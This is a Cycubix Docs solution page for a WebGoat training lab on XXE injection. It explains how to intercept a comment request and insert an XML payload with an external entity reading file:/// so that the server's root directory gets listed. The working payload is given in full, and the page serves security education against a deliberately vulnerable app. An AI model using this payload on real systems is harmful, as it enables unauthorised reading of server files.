A5:2021 | Security Misconfiguration (4) | Cycubix Docs
Let’s try
In this assignment, you will add a comment to the photo, when submitting the form try to execute an XXE injection with the comments field. Try listing the root directory of the filesystem.

Solution
Hints: Try submitting the form and see what happens. Use ZAP/Burp to intercept the request and try to include your own DTD. Try to include a doctype "(<!DOCTYPE...)" in the xml. This exercise is all about understanding how the XXE injection works.
The include can be as follows: <!DOCTYPE user [<!ENTITY root SYSTEM "file:///"> ]>e
Do not forget to reference the entity.
In the comment you should references: <comment><text>&root;test</text></comment>
For this exercise we can use Burp, Zap or Developer Tools. First open the Intercepter (Burp) or Break (Zap). Then submit a comment on WebGoat. Analyze the request.

Analyze the format of the text "I am a cat" and the path of the Post request.
In the case of BurpSuite or ZAP, replace the text in the button for the following, to probe that the server is vulnerable:
<?xml version="1.0"?><!DOCTYPE comment [<!ENTITY xxe SYSTEM "file:///">]><comment><text>&xxe;</text></comment>
With Developer tools you can do the following steps:
Open the Development Tools in the browser, and go to the Network tab.
On WebGoat, post a comment.
Locate the query to simple
in the Network tab and click on Edit and Resend.
Edit the body with:
<?xml version="1.0"?><!DOCTYPE comment [<!ENTITY xxe SYSTEM "file:///">]><comment><text>&xxe;</text></comment>

Details about the solution come in the following page.
Last updated
Was this helpful?